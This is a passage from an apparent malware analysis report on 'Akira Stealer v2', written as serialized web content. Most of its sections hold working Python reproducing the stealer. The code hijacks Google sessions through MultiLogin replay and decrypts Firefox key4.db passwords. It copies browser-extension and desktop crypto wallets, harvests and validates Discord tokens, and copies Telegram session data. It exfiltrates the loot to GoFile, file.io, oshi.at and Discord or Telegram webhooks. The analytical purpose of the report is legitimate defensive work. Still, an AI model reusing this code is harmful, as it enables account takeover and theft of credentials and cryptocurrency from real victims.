algorithms.AES(key),\n",[7258,20601,20602],{"class":14951,"line":19081},[7258,20603,20604],{},"        modes.GCM(iv, tag),\n",[7258,20606,20607],{"class":14951,"line":19086},[7258,20608,20609],{},"        backend=default_backend()\n",[7258,20611,20612],{"class":14951,"line":19091},[7258,20613,19220],{},[7258,20615,20616],{"class":14951,"line":19097},[7258,20617,20618],{},"    decryptor = cipher.decryptor()\n",[7258,20620,20621],{"class":14951,"line":19103},[7258,20622,17114],{"emptyLinePlaceholder":415},[7258,20624,20625],{"class":14951,"line":19109},[7258,20626,20627],{},"    # Perform decryption; raises if authentication fails\n",[7258,20629,20630],{"class":14951,"line":19114},[7258,20631,20632],{},"    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n",[7258,20634,20635],{"class":14951,"line":19119},[7258,20636,17114],{"emptyLinePlaceholder":415},[7258,20638,20639],{"class":14951,"line":19124},[7258,20640,20641],{},"    # Decode to UTF-8, ignoring any stray errors\n",[7258,20643,20644],{"class":14951,"line":19129},[7258,20645,20646],{},"    return plaintext.decode('utf-8', errors='ignore')\n",[2548,20648,20650],{"id":20649},"_76-session-token-hijacking","7.6 Session Token Hijacking",[353,20652,10713],{},[353,20654,20655,20656,20659],{},"Akira doesn’t stop at passive data collection—it actively hijacks live session tokens to impersonate victims in real time. After extracting encrypted tokens from browser storage, it reconstructs the required authorization header and replays a ",[433,20657,20658],{},"MultiLogin"," request against Google’s OAuth endpoint. The code snippet below illustrates this process:",[3102,20661,20663],{"className":17754,"code":20662,"language":17756,"meta":402,"style":402},"# Build SAPISIDHASH header for Google services\norigin = \"https://accounts.google.com\"\ntimestamp = int(time.time())\n# Compute SHA1 of \"timestamp origin SAPISID\"\npayload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\nsignature = hashlib.sha1(payload).hexdigest()\nheaders = {\n    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n    \"Content-Type\": \"application/json\"\n}\n# Replay MultiLogin to fetch valid session cookies\nresponse = requests.post(\n    \"https://accounts.google.com/accounts/multilogin\",\n    headers=headers,\n    json={\"continue\": \"https://mail.google.com\"}\n)\nif response.status_code == 200:\n    # Victim’s cookies now present in response.cookies\n    hijacked_cookies = response.cookies\n",[3724,20664,20665,20670,20675,20680,20685,20690,20695,20700,20705,20710,20714,20719,20724,20729,20734,20739,20743,20748,20753],{"__ignoreMap":402},[7258,20666,20667],{"class":14951,"line":14952},[7258,20668,20669],{},"# Build SAPISIDHASH header for Google services\n",[7258,20671,20672],{"class":14951,"line":403},[7258,20673,20674],{},"origin = \"https://accounts.google.com\"\n",[7258,20676,20677],{"class":14951,"line":704},[7258,20678,20679],{},"timestamp = int(time.time())\n",[7258,20681,20682],{"class":14951,"line":15337},[7258,20683,20684],{},"# Compute SHA1 of \"timestamp origin SAPISID\"\n",[7258,20686,20687],{"class":14951,"line":13492},[7258,20688,20689],{},"payload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\n",[7258,20691,20692],{"class":14951,"line":15666},[7258,20693,20694],{},"signature = hashlib.sha1(payload).hexdigest()\n",[7258,20696,20697],{"class":14951,"line":13493},[7258,20698,20699],{},"headers = {\n",[7258,20701,20702],{"class":14951,"line":17117},[7258,20703,20704],{},"    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n",[7258,20706,20707],{"class":14951,"line":17123},[7258,20708,20709],{},"    \"Content-Type\": \"application/json\"\n",[7258,20711,20712],{"class":14951,"line":17369},[7258,20713,15669],{},[7258,20715,20716],{"class":14951,"line":18290},[7258,20717,20718],{},"# Replay MultiLogin to fetch valid session cookies\n",[7258,20720,20721],{"class":14951,"line":18296},[7258,20722,20723],{},"response = requests.post(\n",[7258,20725,20726],{"class":14951,"line":18302},[7258,20727,20728],{},"    \"https://accounts.google.com/accounts/multilogin\",\n",[7258,20730,20731],{"class":14951,"line":18308},[7258,20732,20733],{},"    headers=headers,\n",[7258,20735,20736],{"class":14951,"line":18314},[7258,20737,20738],{},"    json={\"continue\": \"https://mail.google.com\"}\n",[7258,20740,20741],{"class":14951,"line":18320},[7258,20742,18509],{},[7258,20744,20745],{"class":14951,"line":18326},[7258,20746,20747],{},"if response.status_code == 200:\n",[7258,20749,20750],{"class":14951,"line":18332},[7258,20751,20752],{},"    # Victim’s cookies now present in response.cookies\n",[7258,20754,20755],{"class":14951,"line":18338},[7258,20756,20757],{},"    hijacked_cookies = response.cookies\n",[353,20759,20760],{},"By replaying this request, Akira can impersonate the user’s Gmail, Drive, or any other Google service protected by a valid session—no credentials required. This technique leverages Google’s own token acceptance logic, making it nearly indistinguishable from legitimate client behavior.",[2548,20762,20764],{"id":20763},"_77-firefox-decryption","7.7 Firefox Decryption",[353,20766,10713],{},[353,20768,20769,20770,20773],{},"Gecko‑based browsers like Firefox encrypt saved credentials and cookies using a master key stored in ",[3724,20771,20772],{},"key4.db",". Akira includes a stripped‑down decryption routine mirroring Mozilla’s NSS logic, handling both 3DES and AES‑CBC variants without triggering the master password prompt. Example usage:",[3102,20775,20777],{"className":17754,"code":20776,"language":17756,"meta":402,"style":402},"# Load global Salt and encrypted item from key4.db\ndb = sqlite3.connect(profile_path + \"/key4.db\")\ncursor = db.cursor()\ncursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\nglobal_salt, item2 = cursor.fetchone()\n\n# Decode DER structure and derive key\ndecoded, _ = der_decode(item2)\nentry_salt = decoded[0][1][0].asOctets()\ncipher_text = decoded[1].asOctets()\n# Derive 3DES key\nkey = derive_3des_key(global_salt, master_password, entry_salt)\niv = decoded[0][1][1].asOctets()\n# Decrypt credentials\ncipher = DES3.new(key, DES3.MODE_CBC, iv)\nclear_password = unpad(cipher.decrypt(cipher_text))\n\nprint(\"Decrypted Firefox password:\", clear_password)\n",[3724,20778,20779,20784,20789,20794,20799,20804,20808,20813,20818,20823,20828,20833,20838,20843,20848,20853,20858,20862],{"__ignoreMap":402},[7258,20780,20781],{"class":14951,"line":14952},[7258,20782,20783],{},"# Load global Salt and encrypted item from key4.db\n",[7258,20785,20786],{"class":14951,"line":403},[7258,20787,20788],{},"db = sqlite3.connect(profile_path + \"/key4.db\")\n",[7258,20790,20791],{"class":14951,"line":704},[7258,20792,20793],{},"cursor = db.cursor()\n",[7258,20795,20796],{"class":14951,"line":15337},[7258,20797,20798],{},"cursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\n",[7258,20800,20801],{"class":14951,"line":13492},[7258,20802,20803],{},"global_salt, item2 = cursor.fetchone()\n",[7258,20805,20806],{"class":14951,"line":15666},[7258,20807,17114],{"emptyLinePlaceholder":415},[7258,20809,20810],{"class":14951,"line":13493},[7258,20811,20812],{},"# Decode DER structure and derive key\n",[7258,20814,20815],{"class":14951,"line":17117},[7258,20816,20817],{},"decoded, _ = der_decode(item2)\n",[7258,20819,20820],{"class":14951,"line":17123},[7258,20821,20822],{},"entry_salt = decoded[0][1][0].asOctets()\n",[7258,20824,20825],{"class":14951,"line":17369},[7258,20826,20827],{},"cipher_text = decoded[1].asOctets()\n",[7258,20829,20830],{"class":14951,"line":18290},[7258,20831,20832],{},"# Derive 3DES key\n",[7258,20834,20835],{"class":14951,"line":18296},[7258,20836,20837],{},"key = derive_3des_key(global_salt, master_password, entry_salt)\n",[7258,20839,20840],{"class":14951,"line":18302},[7258,20841,20842],{},"iv = decoded[0][1][1].asOctets()\n",[7258,20844,20845],{"class":14951,"line":18308},[7258,20846,20847],{},"# Decrypt credentials\n",[7258,20849,20850],{"class":14951,"line":18314},[7258,20851,20852],{},"cipher = DES3.new(key, DES3.MODE_CBC, iv)\n",[7258,20854,20855],{"class":14951,"line":18320},[7258,20856,20857],{},"clear_password = unpad(cipher.decrypt(cipher_text))\n",[7258,20859,20860],{"class":14951,"line":18326},[7258,20861,17114],{"emptyLinePlaceholder":415},[7258,20863,20864],{"class":14951,"line":18332},[7258,20865,20866],{},"print(\"Decrypted Firefox password:\", clear_password)\n",[353,20868,20869,20870,2454,20872,15448,20874,20876],{},"With this routine, Akira can transparently dump ",[3724,20871,20268],{},[3724,20873,20271],{},[3724,20875,20274],{}," for each Firefox profile, writing the decrypted output to:",[3102,20878,20881],{"className":20879,"code":20880,"language":3722},[3720],"Passwords/Firefox_\u003CProfileName> Passwords.txt\nCookies/Firefox_\u003CProfileName> Cookies.txt\nHistory/Firefox_\u003CProfileName> History.txt\n",[3724,20882,20880],{"__ignoreMap":402},[353,20884,20885],{},"This approach sidesteps user-level master password checks, giving the stealer unfettered access to all stored credentials.*",[353,20887,20888],{},[433,20889,20890],{},"4. File Structure & Naming",[3102,20892,20895],{"className":20893,"code":20894,"language":3722,"meta":402},[3720],"\u003CComputerName>.zip\n└── \u003CComputerName>\\\n    ├── Passwords\\\n    │   ├── Chrome Passwords.txt\n    │   ├── Edge Passwords.txt\n    │   └── …\n    ├── Cookies\\\n    │   ├── Chrome Cookies.txt\n    │   ├── Edge Cookies.txt\n    │   ├── user@example.com Google Session.txt\n    │   └── …\n    ├── CreditCards\\\n    │   ├── Chrome CreditCards.txt\n    │   └── …\n    ├── History\\\n    │   ├── Chrome History.txt\n    │   └── …\n    ├── Autofill\\\n    │   ├── Chrome Autofill.txt\n    │   └── …\n    └── Wallets\\\n        ├── Firefox_Default_profiles.zip\n        ├── Firefox_Profile1_profiles.zip\n        └── …\n",[3724,20896,20894],{"__ignoreMap":402},[367,20898,20899,20913,20919],{},[370,20900,20901,20902,20905,20906,20909,20910,12376],{},"Each ",[3724,20903,20904],{},".txt"," begins with a consistent header (",[3724,20907,20908],{},"\u003C================[Akira Stealer v2]>================>",") and separator line (",[3724,20911,20912],{},"====…====",[370,20914,20915,20916,456],{},"On‑disk ZIP: ",[3724,20917,20918],{},"%TEMP%\\\u003CComputerName>.zip",[370,20920,20921,20922,456],{},"C&C filename label: ",[3724,20923,20924],{},"Akira-\u003Cusername>.zip",[353,20926,20927],{},[433,20928,20929],{},"5. Exfiltration & Cleanup",[3102,20931,20933],{"className":17754,"code":20932,"language":17756,"meta":402,"style":402},"url = Webhook.uploadToGofile(zip_path)\nif not url:\n    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\nWebhook.sendDataTG(zip_path, chatId, startup)\nUtils.clear_client_folder()\n",[3724,20934,20935,20940,20945,20950,20955],{"__ignoreMap":402},[7258,20936,20937],{"class":14951,"line":14952},[7258,20938,20939],{},"url = Webhook.uploadToGofile(zip_path)\n",[7258,20941,20942],{"class":14951,"line":403},[7258,20943,20944],{},"if not url:\n",[7258,20946,20947],{"class":14951,"line":704},[7258,20948,20949],{},"    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[7258,20951,20952],{"class":14951,"line":15337},[7258,20953,20954],{},"Webhook.sendDataTG(zip_path, chatId, startup)\n",[7258,20956,20957],{"class":14951,"line":13492},[7258,20958,20959],{},"Utils.clear_client_folder()\n",[367,20961,20962,20972,20986,21003],{},[370,20963,20964,20967,20968,20971],{},[433,20965,20966],{},"Primary Channel (GoFile.io):"," The malware first attempts to upload the ZIP archive containing all stolen artifacts to GoFile.io, parsing the JSON response for a ",[3724,20969,20970],{},"downloadPage"," URL that grants the attacker direct access to the archive.",[370,20973,20974,20977,20978,20981,20982,20985],{},[433,20975,20976],{},"Automatic Fallbacks:"," Should the GoFile endpoint fail (network timeout, rate limit, etc.), the code seamlessly falls back to ",[3724,20979,20980],{},"file.io",", and if that too returns an empty link, finally to ",[3724,20983,20984],{},"oshi.at",". Both alternatives are invoked without raising exceptions, ensuring that one of the three services will always be tried in succession.",[370,20987,20988,20991,20992,20995,20996,2454,20999,21002],{},[433,20989,20990],{},"Webhook Reporting:"," Once a URL (or an empty string on persistent failure) is determined, ",[3724,20993,20994],{},"Webhook.sendDataTG(...)"," is called, packaging together the download link, machine identifiers (",[3724,20997,20998],{},"chatId",[3724,21000,21001],{},"startup"," flag) and all category counts (passwords, cookies, autofills, wallets) into a single Discord or Telegram message.",[370,21004,21005,21008,21009,21012],{},[433,21006,21007],{},"Immediate Cleanup:"," After reporting, ",[3724,21010,21011],{},"Utils.clear_client_folder()"," recursively deletes the entire temporary workspace and the ZIP file itself, leaving no trace of the harvested data or the archive on disk.",[2179,21014,21015,21020],{},[353,21016,21017],{},[433,21018,21019],{},"Failure Resilience:",[367,21021,21022,21029],{},[370,21023,21024,21025,21028],{},"All upload routines return ",[3724,21026,21027],{},"\"\""," on failure instead of throwing, guaranteeing the code flow continues.",[370,21030,21031],{},"Even if every service is unreachable, the malware still transmits a webhook report (albeit with a missing link) before erasing local artifacts, minimizing forensic remnants unless the process crashes unexpectedly.",[2559,21033],{"className":21034},[14110,14111],[353,21036,21037],{},[433,21038,21039],{},"6. Robustness & Error Handling",[367,21041,21042,21060,21066,21075],{},[370,21043,21044,21047,21048,21051,21052,21055,21056,21059],{},[433,21045,21046],{},"Granular Exception Handling:"," Every file system interaction—be it ",[3724,21049,21050],{},"shutil.copy",", SQLite queries, or ZIP operations—is wrapped in ",[3724,21053,21054],{},"try/except"," blocks. When an error occurs (locked DB, permission denied, malformed record), the exception is caught and logged via ",[3724,21057,21058],{},"Akira.logErrorTg()",", and execution continues, isolating the failure to that specific file or module.",[370,21061,21062,21065],{},[433,21063,21064],{},"Threaded Isolation per Browser:"," The extraction routines for each supported browser run in their own thread. This multi-threaded design ensures that a crash or deadlock in one browser’s extraction (e.g., corrupt profile, missing key) does not halt or delay the analysis of other browsers.",[370,21067,21068,21071,21072,21074],{},[433,21069,21070],{},"Silent Fallbacks & Defaults:"," Many auxiliary routines, such as uploading to alternate file hosts, checking remote resources, or spawning subprocesses, employ nested ",[3724,21073,21054],{}," without surface-level alerts—maximizing stealth. Default values (empty strings, booleans) are chosen to keep the flow uninterrupted and remove obvious error conditions.",[370,21076,21077,21080,21081,21084,21085,21088],{},[433,21078,21079],{},"Mutex & Startup Guards:"," A named mutex (",[3724,21082,21083],{},"1qsMlseJplTlArIF14f",") prevents multiple instances, while registry checks and ",[3724,21086,21087],{},"Utils.CreateMutex()"," protect against concurrent runs, providing additional stability during real-world deployment.",[2548,21090,21092],{"id":21091},"_78-wallet-and-token-exfiltration","7.8 Wallet and Token Exfiltration",[353,21094,10713],{},[353,21096,21097],{},"In this phase, Akira Stealer v2 performs the most comprehensive sweep for cryptocurrency credentials and session tokens, spanning browser extensions, desktop wallets, messaging tokens, and live keylogging. It executes in parallel threads, ensuring no vector is missed. Below is a step-by-step, code-backed deep dive.",[629,21099,21101],{"id":21100},"_781-browser-extension-wallets","7.8.1 Browser Extension Wallets",[353,21103,14147],{},[353,21105,21106,21109],{},[433,21107,21108],{},"Targets:"," Over 80 extensions across popular browsers, including MetaMask, Phantom, Trust Wallet, Coinbase Wallet, Solflare, Exodus, Binance Chain Wallet, Keplr, Nami, TronLink, Rabby, Talisman, and more.",[3102,21111,21113],{"className":17754,"code":21112,"language":17756,"meta":402,"style":402},"# Hardcoded list of extension IDs and human-friendly names\nwalletsExtensions = [\n    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n    [\"Nami\",            \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n    # ... plus dozens more mapped in code\n]\n# Extraction loop for each browser profile\nfor browser_name, (user_data, proc_name) in paths.items():\n    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n    for ext_name, ext_id in walletsExtensions:\n        src = os.path.join(base, ext_id)\n        if os.path.isdir(src):\n            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n            shutil.copytree(src, dest, dirs_exist_ok=True)\n            data.ext_wallets_count += 1\n",[3724,21114,21115,21120,21125,21130,21135,21140,21145,21150,21155,21160,21165,21170,21175,21180,21185,21190,21195,21200,21205,21210,21215,21220,21225],{"__ignoreMap":402},[7258,21116,21117],{"class":14951,"line":14952},[7258,21118,21119],{},"# Hardcoded list of extension IDs and human-friendly names\n",[7258,21121,21122],{"class":14951,"line":403},[7258,21123,21124],{},"walletsExtensions = [\n",[7258,21126,21127],{"class":14951,"line":704},[7258,21128,21129],{},"    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n",[7258,21131,21132],{"class":14951,"line":15337},[7258,21133,21134],{},"    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n",[7258,21136,21137],{"class":14951,"line":13492},[7258,21138,21139],{},"    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n",[7258,21141,21142],{"class":14951,"line":15666},[7258,21143,21144],{},"    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n",[7258,21146,21147],{"class":14951,"line":13493},[7258,21148,21149],{},"    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n",[7258,21151,21152],{"class":14951,"line":17117},[7258,21153,21154],{},"    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n",[7258,21156,21157],{"class":14951,"line":17123},[7258,21158,21159],{},"    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n",[7258,21161,21162],{"class":14951,"line":17369},[7258,21163,21164],{},"    [\"Nami\",            \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n",[7258,21166,21167],{"class":14951,"line":18290},[7258,21168,21169],{},"    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n",[7258,21171,21172],{"class":14951,"line":18296},[7258,21173,21174],{},"    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n",[7258,21176,21177],{"class":14951,"line":18302},[7258,21178,21179],{},"    # ... plus dozens more mapped in code\n",[7258,21181,21182],{"class":14951,"line":18308},[7258,21183,21184],{},"]\n",[7258,21186,21187],{"class":14951,"line":18314},[7258,21188,21189],{},"# Extraction loop for each browser profile\n",[7258,21191,21192],{"class":14951,"line":18320},[7258,21193,21194],{},"for browser_name, (user_data, proc_name) in paths.items():\n",[7258,21196,21197],{"class":14951,"line":18326},[7258,21198,21199],{},"    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n",[7258,21201,21202],{"class":14951,"line":18332},[7258,21203,21204],{},"    for ext_name, ext_id in walletsExtensions:\n",[7258,21206,21207],{"class":14951,"line":18338},[7258,21208,21209],{},"        src = os.path.join(base, ext_id)\n",[7258,21211,21212],{"class":14951,"line":18344},[7258,21213,21214],{},"        if os.path.isdir(src):\n",[7258,21216,21217],{"class":14951,"line":18350},[7258,21218,21219],{},"            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n",[7258,21221,21222],{"class":14951,"line":18356},[7258,21223,21224],{},"            shutil.copytree(src, dest, dirs_exist_ok=True)\n",[7258,21226,21227],{"class":14951,"line":18362},[7258,21228,21229],{},"            data.ext_wallets_count += 1\n",[367,21231,21232,21238],{},[370,21233,21234,21237],{},[433,21235,21236],{},"Files copied",": Extension-specific IndexedDB, LevelDB, JSON and config files containing encrypted keys, seed phrases, login credentials.",[370,21239,21240,14252,21243,2454,21246,17155],{},[433,21241,21242],{},"Outcome folder",[3724,21244,21245],{},"Wallets/MetaMask_Chrome/",[3724,21247,21248],{},"Wallets/Phantom_Edge/",[629,21250,21252],{"id":21251},"_782-desktop-wallet-applications","7.8.2 Desktop Wallet Applications",[353,21254,14147],{},[353,21256,21257,21259],{},[433,21258,21108],{}," Major desktop clients such as Electrum, Exodus, Atomic Wallet, Guarda, Rabby, Coinomi, Zcash, Armory, Bytecoin, Jaxx, Coinomi, etc.",[3102,21261,21263],{"className":17754,"code":21262,"language":17756,"meta":402,"style":402},"walletsDesktop = [\n    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n    [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n]\nfor name, path in walletsDesktop:\n    if os.path.isdir(path):\n        Utils.TaskKill(name.lower())\n        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n        shutil.copytree(path, dest, dirs_exist_ok=True)\n        data.desktop_wallets_count += 1\n",[3724,21264,21265,21270,21275,21280,21285,21290,21295,21300,21304,21309,21314,21319,21324,21329],{"__ignoreMap":402},[7258,21266,21267],{"class":14951,"line":14952},[7258,21268,21269],{},"walletsDesktop = [\n",[7258,21271,21272],{"class":14951,"line":403},[7258,21273,21274],{},"    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n",[7258,21276,21277],{"class":14951,"line":704},[7258,21278,21279],{},"    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n",[7258,21281,21282],{"class":14951,"line":15337},[7258,21283,21284],{},"    [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n",[7258,21286,21287],{"class":14951,"line":13492},[7258,21288,21289],{},"    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n",[7258,21291,21292],{"class":14951,"line":15666},[7258,21293,21294],{},"    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n",[7258,21296,21297],{"class":14951,"line":13493},[7258,21298,21299],{},"    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n",[7258,21301,21302],{"class":14951,"line":17117},[7258,21303,21184],{},[7258,21305,21306],{"class":14951,"line":17123},[7258,21307,21308],{},"for name, path in walletsDesktop:\n",[7258,21310,21311],{"class":14951,"line":17369},[7258,21312,21313],{},"    if os.path.isdir(path):\n",[7258,21315,21316],{"class":14951,"line":18290},[7258,21317,21318],{},"        Utils.TaskKill(name.lower())\n",[7258,21320,21321],{"class":14951,"line":18296},[7258,21322,21323],{},"        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n",[7258,21325,21326],{"class":14951,"line":18302},[7258,21327,21328],{},"        shutil.copytree(path, dest, dirs_exist_ok=True)\n",[7258,21330,21331],{"class":14951,"line":18308},[7258,21332,21333],{},"        data.desktop_wallets_count += 1\n",[367,21335,21336,21349],{},[370,21337,21338,21341,21342,2454,21345,21348],{},[433,21339,21340],{},"Data stolen",": Keystore files (",[3724,21343,21344],{},"*.dat",[3724,21346,21347],{},"*.json","), private key exports, wallet configuration and transaction history.",[370,21350,21351,21354],{},[433,21352,21353],{},"Benefit",": Offline wallet contents usable by the attacker to authorize transactions.",[629,21356,21358],{"id":21357},"_783-discord-token-harvest","7.8.3 Discord Token Harvest",[353,21360,14147],{},[353,21362,21363],{},"Discord tokens are authentication artifacts—essentially long-lived bearer tokens—that can grant full access to a user’s account without requiring their credentials or MFA. Akira exploits this by scanning browser and app data folders for tokens stored by various Discord clients, including Discord Stable, Canary, PTB (Public Test Build), and even modified forks like Lightcord.",[353,21365,21366],{},"The technique targets LevelDB files under the application's Local Storage, where authentication tokens often remain in plaintext. Using regular expressions, the malware scans these .log and .ldb files for patterns that match either regular user tokens or MFA-enabled tokens.",[353,21368,21369],{},"To increase reliability and reduce noise, Akira includes a validation step: it sends a test request to Discord’s /users/@me endpoint using each harvested token. Only tokens that successfully authenticate (HTTP 200) are exfiltrated via webhook—typically to a Discord channel under attacker control.",[353,21371,21372],{},"This method allows attackers to hijack Discord accounts in real time, impersonate the victim, scrape DMs and guilds, or deploy further malware through social engineering—all without triggering login alerts.",[3102,21374,21376],{"className":17754,"code":21375,"language":17756,"meta":402,"style":402},"import re, requests\npatterns = [\n    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n]\ndef harvest_discord(base, webhook_url):\n    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n    for file in os.listdir(db_dir):\n        if file.endswith(('.log', '.ldb')):\n            for line in open(os.path.join(db_dir, file), errors='ignore'):\n                for pat in patterns:\n                    for token in re.findall(pat, line):\n                        # Verify token\n                        h = {\"Authorization\": token}\n                        r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n                        if r.status_code == 200:\n                            uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n                            requests.post(webhook_url, json=payload)\n",[3724,21377,21378,21383,21388,21393,21398,21402,21407,21412,21417,21422,21427,21432,21437,21442,21447,21452,21457,21462,21467],{"__ignoreMap":402},[7258,21379,21380],{"class":14951,"line":14952},[7258,21381,21382],{},"import re, requests\n",[7258,21384,21385],{"class":14951,"line":403},[7258,21386,21387],{},"patterns = [\n",[7258,21389,21390],{"class":14951,"line":704},[7258,21391,21392],{},"    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n",[7258,21394,21395],{"class":14951,"line":15337},[7258,21396,21397],{},"    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n",[7258,21399,21400],{"class":14951,"line":13492},[7258,21401,21184],{},[7258,21403,21404],{"class":14951,"line":15666},[7258,21405,21406],{},"def harvest_discord(base, webhook_url):\n",[7258,21408,21409],{"class":14951,"line":13493},[7258,21410,21411],{},"    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n",[7258,21413,21414],{"class":14951,"line":17117},[7258,21415,21416],{},"    for file in os.listdir(db_dir):\n",[7258,21418,21419],{"class":14951,"line":17123},[7258,21420,21421],{},"        if file.endswith(('.log', '.ldb')):\n",[7258,21423,21424],{"class":14951,"line":17369},[7258,21425,21426],{},"            for line in open(os.path.join(db_dir, file), errors='ignore'):\n",[7258,21428,21429],{"class":14951,"line":18290},[7258,21430,21431],{},"                for pat in patterns:\n",[7258,21433,21434],{"class":14951,"line":18296},[7258,21435,21436],{},"                    for token in re.findall(pat, line):\n",[7258,21438,21439],{"class":14951,"line":18302},[7258,21440,21441],{},"                        # Verify token\n",[7258,21443,21444],{"class":14951,"line":18308},[7258,21445,21446],{},"                        h = {\"Authorization\": token}\n",[7258,21448,21449],{"class":14951,"line":18314},[7258,21450,21451],{},"                        r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n",[7258,21453,21454],{"class":14951,"line":18320},[7258,21455,21456],{},"                        if r.status_code == 200:\n",[7258,21458,21459],{"class":14951,"line":18326},[7258,21460,21461],{},"                            uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n",[7258,21463,21464],{"class":14951,"line":18332},[7258,21465,21466],{},"                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n",[7258,21468,21469],{"class":14951,"line":18338},[7258,21470,21471],{},"                            requests.post(webhook_url, json=payload)\n",[367,21473,21474],{},[370,21475,21476,21479],{},[433,21477,21478],{},"Validation",": Only posts valid tokens, preventing stale JWTs from being sent.",[629,21481,21483],{"id":21482},"_784-telegram-session-files","7.8.4 Telegram Session Files",[353,21485,14147],{},[353,21487,21488,21490],{},[433,21489,21108],{}," Telegram Desktop/TData",[3102,21492,21494],{"className":17754,"code":21493,"language":17756,"meta":402,"style":402},"def steal_telegram(tdata_path, dest_root):\n    if os.path.exists(tdata_path):\n        Utils.TaskKill(\"telegram.exe\")\n        dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n        shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n        data.has_telegram = True\n",[3724,21495,21496,21501,21506,21511,21516,21521],{"__ignoreMap":402},[7258,21497,21498],{"class":14951,"line":14952},[7258,21499,21500],{},"def steal_telegram(tdata_path, dest_root):\n",[7258,21502,21503],{"class":14951,"line":403},[7258,21504,21505],{},"    if os.path.exists(tdata_path):\n",[7258,21507,21508],{"class":14951,"line":704},[7258,21509,21510],{},"        Utils.TaskKill(\"telegram.exe\")\n",[7258,21512,21513],{"class":14951,"line":15337},[7258,21514,21515],{},"        dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n",[7258,21517,21518],{"class":14951,"line":13492},[7258,21519,21520],{},"        shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n",[7258,21522,21523],{"class":14951,"line":15666},[7258,21524,21525],{},"        data.has_telegram = True\n",[367,21527,21528,21541],{},[370,21529,21530,14252,21533,21536,21537,21540],{},[433,21531,21532],{},"Files",[3724,21534,21535],{},"tdata"," folder containing session keys, ",[3724,21538,21539],{},"D877F..."," folder with secret/unsecret files.",[370,21542,21543,21546],{},[433,21544,21545],{},"Use",": Load into attacker’s Telegram client for full account 